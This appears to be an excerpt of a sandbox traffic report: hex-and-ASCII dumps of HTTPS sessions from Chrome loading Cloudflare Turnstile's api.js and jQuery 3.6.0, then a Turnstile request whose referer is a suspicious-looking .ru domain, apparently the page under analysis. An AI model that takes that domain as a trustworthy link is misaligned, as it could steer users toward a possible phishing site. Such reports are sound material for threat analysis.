                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(fu
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e
                                                                                  Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(fun
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73
                                                                                  Data Ascii: function gt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.s
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c
                                                                                  Data Ascii: ==Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==nul
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e
                                                                                  Data Ascii: {return Be()?Ie=Reflect.construct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28
                                                                                  Data Ascii: tion b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 64 65 6e 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65
                                                                                  Data Ascii: den",f.style.overflowY="auto",f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.449761151.101.130.1374433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:43 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                  Host: code.jquery.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:43 UTC613INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  Content-Length: 89501
                                                                                  Server: nginx
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                  ETag: "28feccc0-15d9d"
                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 1835153
                                                                                  Date: Wed, 02 Oct 2024 15:49:43 GMT
                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740028-EWR
                                                                                  X-Cache: HIT, HIT
                                                                                  X-Cache-Hits: 5889, 0
                                                                                  X-Timer: S1727884183.260285,VS0,VE1
                                                                                  Vary: Accept-Encoding
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                  2024-10-02 15:49:43 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.449762104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:43 UTC801OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/ HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:43 UTC1369INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:43 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 164871
                                                                                  Connection: close
                                                                                  cross-origin-opener-policy: same-origin
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  origin-agent-cluster: ?1
